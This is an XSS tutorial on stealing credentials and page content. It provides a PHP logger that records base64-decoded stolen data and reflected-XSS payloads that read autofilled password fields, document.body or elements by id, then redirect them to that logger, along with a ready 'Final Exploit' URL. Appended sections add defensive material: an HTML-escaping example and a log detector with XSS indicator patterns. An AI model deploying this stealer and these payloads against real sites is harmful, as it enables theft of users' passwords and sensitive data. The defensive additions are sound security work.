This article is only for educational purposes and I will not be responsible for any damage done by using this technique. This is only to teach and demonstrate the risk and impact of these security flaws.
Cross Site Scripting
Cross-Site Scripting is a vulnerability that allows an attacker to execute JavaScript commands on the web application, which can be used to perform further attacks like virtual defacement, keylogging, or other dangerous tasks. Read more about Cross Site Scripting.
About this article
In this article I will be teaching a new technique for exploiting a Cross Site Scripting vulnerability in order to steal sensitive information and credentials from an XSS-vulnerable page. As JavaScript commands are executable on the site, we are able to perform a large number of attacks, but in this article we will focus on the methodology of stealing, capturing and logging data using an XSS vulnerability. In this article you will learn the following:
- Stealing specific content from a page.
- Stealing inputted values from a page.
- Stealing source code of a vulnerable page.
- Accessing values of different areas.
- Logging the captured data back to file.
Requirements:
We need to set up the following things in order to proceed:
- Apache server / website (for hosting the .php file)
- .PHP data logger
- Basic knowledge of XSS
Location for hosting your files
You need to set up a place where you will be hosting your .php stealer. I am using XAMPP to run these files on my computer. You can also try hosting sites like 000webhost or any other.
PHP data logger
We will need a .php file which will log the data sent to it into a text file so we can view it afterwards. The following is the source code of the PHP file I am going to use; you need to upload this to a site or store it on localhost:
Sourcecode:
<?php
error_reporting(0);
$filename = 'log.txt';

if (isset($_GET['c'])) {
    // Log the requesting host, the client address and the base64-decoded data
    $content  = '[Host]: ' . $_SERVER['HTTP_HOST'] . PHP_EOL;
    $content .= '[Remote Addr]: ' . $_SERVER['REMOTE_ADDR'] . PHP_EOL;
    $content .= '[Sensitive Information]: ' . base64_decode($_GET['c']) . PHP_EOL;
    $content .= PHP_EOL . PHP_EOL;
    file_put_contents($filename, $content, FILE_APPEND | LOCK_EX);
} else {
    // No data supplied: display the log file, one entry per line
    $data = file_get_contents($filename);
    $convert = explode("\n", $data);
    for ($i = 0; $i < count($convert); $i++) {
        echo $convert[$i] . '<br>';
    }
}

// Send the visitor on to Google afterwards
echo '<script>document.location="https://google.com/";</script>';
?>
Save it as index.php on your localhost or site.
Also create an empty log.txt file in the same directory. I will be saving both files on localhost (127.0.0.1/index.php, 127.0.0.1/log.txt).
Exploitation
Testing the XSS
Now we need to find a site vulnerable to XSS. For testing an XSS vulnerability from the beginning, see this article.
After finding the site we need to inject a basic payload into any input area in order to test it; if the payload is reflected back without any filtering, the site is vulnerable to XSS.
Suppose there is a site http://www.site.com/?msg=invalid username. If we enter <XSS> in the msg parameter and check its response, and the response is not filtered or sanitized and reflects the input back as it is, then the site is vulnerable to a Cross Site Scripting attack. But we need to execute a JavaScript command first; injecting a basic probe tag only tests whether the site accepts tags or not. Once we know the tags are not filtered we can inject "><img src=x onerror=prompt(1)> in order to execute the JavaScript popup. On the right side, you can see an image which shows a popup, which means the payload we injected was successfully executed on the site.
Popup = Vulnerable to XSS
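The reflection that makes a parameter such as msg exploitable, placed beside its hardened form, as an added example that is not from the original article. The templates, the escapeHtml helper, the containsEventHandler check and the probe string are all constructed for this illustration; the script runs under Node.js with no browser needed.

```javascript
// Added example (not from the original article): the reflection that makes a
// parameter such as ?msg= exploitable, beside an output-encoded version that
// neutralises the probe payload. Runs under Node.js; no browser is needed.
// The templates and the probe string are constructed for this illustration.

// Encode the five characters that matter when untrusted text lands inside an
// HTML element body or a quoted attribute value.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Vulnerable rendering: the query value is concatenated straight into markup,
// so a value containing a tag becomes part of the page's DOM.
function renderVulnerable(msg) {
  return '<div class="error">' + msg + '</div>';
}

// Hardened rendering: the same template, but the value is encoded for an HTML
// text context first. The browser then shows the payload as literal text.
function renderSafe(msg) {
  return '<div class="error">' + escapeHtml(msg) + '</div>';
}

// Rough check used below: does the output contain an element that carries an
// on* event-handler attribute? Enough to show the difference between the two
// renderers; a real scanner would parse the HTML properly.
const HANDLER_RE = /<[a-z][^>]*\son[a-z]+\s*=/i;
function containsEventHandler(html) {
  return HANDLER_RE.test(html);
}

// Constructed sample: the probe the article injects to confirm reflection.
const PROBE = '"><img src=x onerror=prompt(1)>';

console.log("vulnerable:", renderVulnerable(PROBE));
console.log("  handler present:", containsEventHandler(renderVulnerable(PROBE)));
console.log("hardened:  ", renderSafe(PROBE));
console.log("  handler present:", containsEventHandler(renderSafe(PROBE)));
```

The encoded output still displays the same text to the user, so the error message keeps working; only the ability of the value to create elements or attributes is gone. The encoding must match the context (element body or quoted attribute here); a value placed inside a script block or a URL attribute needs a different encoder.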
Stealing sensitive information & credentials with XSS
The following are the methods for these tasks:
- Stealing Credentials/Sensitive information
- Source Code Stealing
- Stealing a specific content
Stealing Credentials / Sensitive information
Most of the time there is some sensitive information stored in the web page. Most users and administrators these days use the Auto-Complete function in login panels, admin panels or other input areas, such as a field that carries a credit card number. First of all, I'd suggest avoiding these kinds of functionality that automatically fill in your credentials. So in this method we are going to steal credentials from an admin panel. The following are the rules for this:
- Data must be inputted automatically(Auto-complete functionality).
- The payload should be executed after the data is entered.
Before creating the payload we need to check how many input fields there are. After that, suppose we need to get the value entered in the Password field, which is the 3rd field. We will use the following code:
document.getElementsByTagName('input')[2].value
We can access the 3rd input tag using getElementsByTagName('input')[2]; if it were the second field we would use [1] instead of [2]. The .value property selects the value entered in that specified field. So if the password field has a value entered by the user, this will return that value.
In the following image you can see the fields numbered from 0 to 2 as there are 3 fields:
Now let's try to get the value entered in the third field (index 2). Just for a simple test we will use alert() to show the value in a popup, so we can make sure that we have accessed the value entered in that field. Make sure to always use an IMG tag instead of a SCRIPT tag, because the img takes a while to load and can capture the data easily, while the script tag would execute the command before the data is entered in the input field. We will use the following payload for that:
<img src=x onerror="alert(document.getElementsByTagName('input')[2].value)">
The above payload will show the password entered in the 3rd field in a popup:
As you can see in the above image, we have successfully accessed the password of the panel. The next step is to steal the password and log it into a text file. Here we will need the PHP stealer that we created before the exploitation. We have to create a payload that sends the password to our PHP stealer so that the PHP file can log it into a text file. We use a redirection to do that: location can be used to send the password to the stealer. The following is the syntax:
location=('URL to PHP file')
This is used for redirections; now we need to include document.getElementsByTagName('input')[2].value so it will be sent to the PHP file. So this will be our final payload:
<img src=x onerror="location=('http://127.0.0.1/?c=' %2b btoa(document.getElementsByTagName('input')[2].value))">
Here is our final payload; this will redirect to the PHP stealer and will combine the URL and the data like this: 127.0.0.1/?c=PASSWORD. Also you may have noticed that I used %2b instead of +; that's because when we enter this in the URL the + would be converted to a space, but we want a plus sign, so I used the URL-encoded +, and the %2b is converted to + when it is entered in the URL. I also used btoa() to BASE64-encode the password so that characters like # or & won't create any problem, and I have also included the base64_decode() function in the PHP file, which decodes it again before logging.
Final Exploit: http://site.com/?msg=<img src=x onerror="location=('http://127.0.0.1/?c=' %2b btoa(document.getElementsByTagName('input')[2].value))">
This will steal the password and will log it into a log.txt file:
This is how we can steal sensitive information and credentials from login pages and input areas using XSS. There are also other methods for stealing different information.
Stealing source code:
We can get the source code of the <body></body> tag by using the following payload: <img src=x onerror="location=('http://127.0.0.1/?c=' %2b document.body.innerHTML)">
This will capture the source code of the Body tag. Most of the information and secret URLs are placed in this tag, and we can get them using this trick. This may lead to a great info disclosure. The procedure for logging the data with this trick is the same as the previous one; just the payload is different.
Stealing source code by specified Id:
Suppose there is an element with Id "shawar". We are able to get it using the following payload: <img src=x onerror="location=('http://127.0.0.1/?c=' %2b document.getElementById('shawar').innerHTML)">
Suppose there is a tag <div id="shawar">secret information</div>; then using the above payload will capture the secret information. These techniques can be used to capture lots of sensitive information and can be handy at times.
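A detector for the request side of both the credential-stealing payloads and the source-code-stealing payloads above, as an added example that is not from the original article. It scans web-server access-log lines for the patterns these payloads leave in the msg parameter (a tag, an on* handler, a DOM read such as document.body or getElementById, a location redirect, a btoa call) and scores each request by how many indicators it matched. The log lines are constructed samples in Apache combined format, the indicator list and the scoring are my own choices, and the script runs under Node.js.

```javascript
// Added example (not from the original article): a detector that scans
// web-server access-log lines for the reflected-XSS payloads shown in this
// article and reports which indicators each request matched. Log lines are
// constructed samples in Apache combined format. Runs under Node.js.

const SAMPLE_LOG = [
  // harmless use of the parameter
  '203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /?msg=invalid+username HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
  // the prompt(1) probe
  '203.0.113.5 - - [10/Oct/2023:13:56:01 +0000] "GET /?msg=%3Cimg%20src%3Dx%20onerror%3Dprompt(1)%3E HTTP/1.1" 200 540 "-" "Mozilla/5.0"',
  // the credential-exfiltration payload, URL-encoded as a browser would send it
  '203.0.113.5 - - [10/Oct/2023:13:57:12 +0000] "GET /?msg=%3Cimg%20src%3Dx%20onerror%3D%22location%3D(%27http%3A%2F%2F127.0.0.1%2F%3Fc%3D%27%2Bbtoa(document.getElementsByTagName(%27input%27)%5B2%5D.value))%22%3E HTTP/1.1" 200 600 "-" "Mozilla/5.0"',
  // unrelated request
  '198.51.100.7 - - [10/Oct/2023:13:58:00 +0000] "GET /products?id=42 HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
];

// client ip, timestamp, method and request target from a combined-format line
const REQUEST_RE = /^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*"/;

// Indicators drawn from the payloads in this article. Each one alone is weak;
// several on one request is a strong signal.
const INDICATORS = [
  { name: "html-tag", re: /<[a-z]/i },
  { name: "event-handler", re: /\bon(error|load|click|focus|blur|mouse\w+)\s*=/i },
  { name: "dom-read", re: /document\.(getElementsByTagName|getElementById|body|cookie)\b/ },
  { name: "redirect", re: /\blocation\s*=/ },
  { name: "base64-encode", re: /\bbtoa\s*\(/ },
];

// Decode percent-encoding repeatedly (bounded) so double-encoded payloads are
// inspected in their final form; stop on malformed sequences.
function fullyDecode(value) {
  let current = value;
  for (let i = 0; i < 3; i++) {
    let next;
    try {
      next = decodeURIComponent(current);
    } catch (e) {
      break;
    }
    if (next === current) break;
    current = next;
  }
  return current;
}

// Returns null for lines that do not parse or show no indicator, otherwise a
// finding with the matched indicators per query parameter and a total score.
function analyzeLine(line) {
  const m = REQUEST_RE.exec(line);
  if (!m) return null;
  const [, ip, timestamp, method, target] = m;
  const q = target.indexOf("?");
  if (q < 0) return null;
  const hits = [];
  // URLSearchParams handles "+" and the first layer of %xx decoding
  for (const [param, raw] of new URLSearchParams(target.slice(q + 1))) {
    const decoded = fullyDecode(raw);
    const matched = INDICATORS.filter((ind) => ind.re.test(decoded)).map((ind) => ind.name);
    if (matched.length > 0) hits.push({ param, indicators: matched, decoded });
  }
  if (hits.length === 0) return null;
  const score = hits.reduce((n, h) => n + h.indicators.length, 0);
  return { ip, timestamp, method, path: target.slice(0, q), score, hits };
}

function scanLog(lines) {
  return lines.map(analyzeLine).filter((f) => f !== null);
}

for (const finding of scanLog(SAMPLE_LOG)) {
  console.log(`${finding.timestamp} ${finding.ip} ${finding.path} score=${finding.score}`);
  for (const h of finding.hits) console.log(`  ${h.param}: ${h.indicators.join(", ")}`);
}
```

The probe request scores 2 (a tag plus a handler) and the exfiltration request scores 5, while the two ordinary requests produce no finding. Scoring by indicator count rather than alerting on any single regex keeps legitimate values that happen to contain an angle bracket from flooding the queue, and logging the decoded parameter alongside the finding lets an analyst see the payload in the form the browser actually executed.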